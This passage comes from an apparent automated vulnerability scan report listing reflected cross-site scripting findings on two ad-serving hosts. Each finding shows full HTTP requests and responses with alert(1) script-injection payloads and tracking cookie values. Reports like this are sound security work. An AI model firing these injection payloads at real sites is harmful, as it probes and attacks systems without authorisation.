User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 334
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="100%" width="100%" src="http://ad.yieldmanager.com/5fcde"><script>alert(1)</script>44f1c8c103a">
...[SNIP]...
2.4. http://ad.yieldmanager.com/rw [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 64f21</title><script>alert(1)</script>64b9de015e6 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=64f21</title><script>alert(1)</script>64b9de015e6&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 831
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>64f21</title><script>alert(1)</script>64b9de015e6</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrollin
...[SNIP]...
2.5. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6a5f"-alert(1)-"1c9c4bb1a71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400&b6a5f"-alert(1)-"1c9c4bb1a71=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#d!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:40 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1620509; rm_tag_type = "pop"; rm_url = "http://ad.yieldmanager.com/imp?Z=0x0&anmember=541&anprice=&b6a5f"-alert(1)-"1c9c4bb1a71=1&y=29&s=1620509&_salt=192209607";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array()
...[SNIP]...
2.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb233"-alert(1)-"19d71a463a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409&fb233"-alert(1)-"19d71a463a=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:50 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close

